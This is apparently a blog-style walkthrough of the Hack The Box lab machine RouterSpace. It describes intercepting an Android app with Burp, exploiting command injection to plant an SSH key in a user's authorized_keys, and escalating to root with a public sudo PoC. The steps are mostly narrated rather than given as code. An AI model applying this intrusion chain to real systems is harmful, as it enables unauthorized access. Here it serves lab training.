RouterSpace

Intro

RouterSpace is an easy machine with an android app vulnerable to Code injection, privilege escalation too was straight forward, the hard part was installing an android emulator on my machine.

I ran Nmap and found just two open ports, 80 and 22.

Went over to the website running on port 80 and couldn't find anything useful other than download link to an APK file with name "RouterSpace.apk".

I downloaded the app but I spent hours trying to find and setup the best Android emulator for Linux and I eventually was able to install anbox, the app was installed on the emulator using "ADB"

Now we have our app installed but we need to intercept packets flowing in and out. To do this, we have to set up proxy on both burp suite as well as adb in terminal. The below command creates proxy on adb:

adb shell settings put global http_proxy 10.10.16.28:8090

10.10.16.28 is the htb tun0 interface IP while 8090 is the port configured on Burp as seen below

After proxy setup, the intercepted page after clicking the "check status" bottom above can be seen below. I sent this page to Burp repeater but it's redirecting to routerspace.htb so I had to add that domain to the /etc/hosts file mapping it to the machine IP address.

after adding IP to hosts file:

As we can see below the app is vulnerable to command injection

RCE

I tried to get RCE but could not however, from enumeration I know the username of the machine is paul and all I have to do is try to put my publick key to the user's "authorized_keys" file. Note I created a new ssh key, you shouldn't put your personal/production keys anywhere and definelty not on HTB boxes.

Privilege Escalation

I was able to login as Paul and get user flag. The next task is escalating my privilege and becoming root, to do this I transferred linpeas.sh to the remote host, unfortunately I couldn't do this with the usual python HTTP.SERVER, probably due to a firewall policy so I decided to use scp to transfer the file through SSH.

The "chmod +x" command is to make the file executable

After enumeration, I saw a vulnerability in sudo. There is a common vulnerability existing in sudo prior to version 1.9.5

Googled for a bit and found the respective CVE here. In order to exploit this vulnerability I used this PoC. I uploaded the exploit from local machine to remote machine with SCP just like I did and the linpeas.sh file, changed permission to execute and executed. Just like that we are root.